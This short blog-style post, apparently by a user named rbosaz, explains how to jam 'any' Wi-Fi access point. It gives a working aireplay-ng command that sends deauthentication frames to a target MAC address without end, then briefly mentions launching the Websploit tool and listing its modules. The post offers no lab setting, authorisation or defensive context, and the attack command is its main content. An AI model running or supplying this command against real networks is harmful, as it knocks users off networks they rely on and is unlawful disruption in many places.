Jamming any Wi-Fi Access Point

By rbosaz, 27 October, 2022

First identify the target AP's MAC address, then use the following command:

sudo aireplay-ng -0 0 -a <Target AP's MAC> <WLAN Name>

Note: -0 0 will execute deauth to infinity

Websploit is another tool that can be used, but you'll need to install it first.

Using the terminal execute the app as follows.

websploit

Available modules can be seen by executing the following.

show modules